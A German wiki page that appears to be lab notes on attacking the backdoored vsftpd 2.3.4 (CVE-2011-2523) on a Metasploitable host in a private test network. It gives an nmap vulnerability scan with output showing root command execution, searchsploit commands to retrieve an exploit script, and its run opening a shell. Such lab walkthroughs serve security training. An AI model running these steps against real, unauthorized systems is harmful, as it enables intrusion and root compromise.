Vsftp4-angriff
Zur Navigation springen
Zur Suche springen
Angreifer
Scan
- nmap -sV --script vuln 10.0.10.105 -p 21
Starting Nmap 7.92 ( https://nmap.org ) at 2021-10-27 19:27 CEST Nmap scan report for metaspoitable.hack.lab (10.0.10.105) Host is up (0.00088s latency). PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 2.3.4 | ftp-vsftpd-backdoor: | VULNERABLE: | vsFTPd version 2.3.4 backdoor | State: VULNERABLE (Exploitable) | IDs: BID:48539 CVE:CVE-2011-2523 | vsFTPd version 2.3.4 backdoor, this was reported on 2011-07-04. | Disclosure date: 2011-07-03 | Exploit results: | Shell command: id | Results: uid=0(root) gid=0(root) | References: | https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2523 | https://www.securityfocus.com/bid/48539 |_ http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html MAC Address: 0C:67:68:58:00:00 (Unknown) Service Info: OS: Unix Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 12.68 seconds
Searchsploit
- searchsploit vsftpd 2.3.4
- searchsploit -m 49757 unix/remote/49757.py
Nach Exploit googlen
- CVE-2011-2523 exploit-db
Exploit finden
Exploit ausführen
Öfter probieren
- python3 49757.py 10.0.10.105
Success, shell opened Send `exit` to quit shell